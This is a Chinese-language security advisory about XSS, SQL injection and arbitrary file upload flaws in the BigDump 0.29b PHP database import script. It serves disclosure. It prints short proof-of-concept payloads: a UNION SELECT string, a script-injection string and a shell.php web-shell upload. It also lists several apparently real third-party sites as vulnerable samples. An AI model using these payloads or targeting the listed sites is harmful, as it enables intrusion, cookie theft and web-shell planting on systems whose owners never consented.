发布日期:2012-11-28
更新日期:2012-12-04受影响系统:
ozerov BigDump 0.29b
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 56744BigDump 是由德国人Alexey Ozerov 用PHP语言开发的一个工具脚本,用来导入批量mysql数据。BigDump 0.29b、0.32b及其他版本在实现上存在跨站脚本、SQL注入、任意文件上传漏洞,利用这些漏洞攻击者可窃取Cookie身份验证凭证、上传任意文件、访问或修改数据、利用下层数据库内的其他漏洞。<*来源:Ur0b0r0x
链接:http://packetstormsecurity.org/files/118463/bigdump032b-shellxsssql.txt
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!http://www.example.com/bigdump.php?start= [SQL]http://www.example.com/bigdump.php?start= [XSS]http://www.example.com/bigdump.php [File Upload]# Expl0it/P0c ###################
http://site.com/bigdump.php?start= < Sql Vulnerability Path >
http://site.com/bigdump.php?start= < Xss Vulnerability Path >
http://site.com/bigdump.php < Arbitrary Upload Path ># Expl0it/P0c/upload ###############
Input $ch = curl_init("http://site.com/bigdump.php?start=shell.php")
Output $ch = curl_init("http://site.com/bigdump/uploads/shell.php")# Expl0it/P0c/Sql ###################
+union+select+1,2,3,4,5,6,7,8,9,10--+# Expl0it/P0c/Xss ###################
"><script>alert(String.fromCharCode(88,83,83))</script># Vulnerability/C0de/###################
<form method="POST" action="<?php echo ($_SERVER["PHP_SELF"]); ?>?action=step3" enctype="multipart/form-data">
<input type="hidden" name="MAX_FILE_SIZE" value="$upload_max_filesize">
<p>Dump file: <input type="file" name="dumpfile" accept="*/*" size=60"></p>
<p><input type="submit" name="uploadbutton" value="Upload"></p></form># Samples/Arbitrart_Upload/Sql/Xss ####################
http://www.fs7a.net/vb/1/bigdump.php
http://www.lis186.com/dump/bigdump.php
http://bigw3.com/bigdump.php
http://twin.skr.jp/bigdump/bigdump.php
http://www.fs7a.net/vb/1/bigdump.php?start=%
http://www.lis186.com/dump/bigdump.php?start=%
http://bigw3.com/bigdump.php?start=%
http://twin.skr.jp/bigdump/bigdump.php?start=%建议:
--------------------------------------------------------------------------------
厂商补丁:ozerov
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.ozerov.de/bigdump/JsUpload "/tmp/uploader"目录穿越漏洞IBM Lotus Symphony多个安全漏洞相关资讯 任意文件上传漏洞 BigDump安全漏洞 BigDump
- Drupal Live CSS模块任意文件上传 (01/22/2013 16:45:18)
- FCKEditor "FileUpload()"函数任意 (12/01/2012 09:28:48)
- WordPress Guest Posting插件" (10/16/2012 06:38:57)
| - WordPress 多个CMSMasters主题" (12/20/2012 12:33:48)
- sflog! <= 1.00 任意文件上传漏洞 (11/05/2012 06:51:50)
- appRain CMF "uploadify.php"远程 (10/16/2012 06:38:09)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即
|
易网时代-编程资源站